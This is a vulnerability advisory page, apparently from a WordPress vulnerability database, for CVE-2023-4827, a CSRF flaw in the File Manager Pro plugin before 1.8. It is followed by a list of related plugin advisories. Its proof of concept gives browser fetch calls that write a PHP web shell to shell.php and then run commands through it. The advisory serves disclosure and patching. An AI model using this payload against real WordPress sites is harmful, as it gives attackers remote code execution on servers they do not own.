File Manager Pro < 1.8 – Remote Code Execution via CSRF | CVE 2023-4827 | Plugin Vulnerabilities

Description

The plugin does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.

Proof of Concept

As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );

Now a logged-out attacker may access `shell.php` as follows:

await (await fetch( "/shell.php?cmd=id" ) ).text()

Affects Plugins

Fixed in 1.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4827-file-manager-pro-1-8-remote-code-execution-via-csrf

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

d4daf0e1-8018-448a-964c-427a355e005f

Timeline

Publicly Published

2023-09-11 (about 8 months ago)

Added

2023-09-11 (about 8 months ago)

Last Updated

2023-09-12 (about 8 months ago)

Other

Published

Title

Published

2024-04-11

Title

Kimili Flash Embed <= 2.5.3 - Cross-Site Request Forgery

Published

2023-02-16

Title

Protected Posts Logout Button < 1.4.5 - Settings Update via CSRF

Published

2022-06-06

Title

miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting

Published

2023-09-08

Title

WP Crowdfunding < 2.1.6 - Cross-Site Request Forgery

Published

2023-11-14

Title

Big File Uploads < 2.1.2 - Cross-Site Request Forgery via actions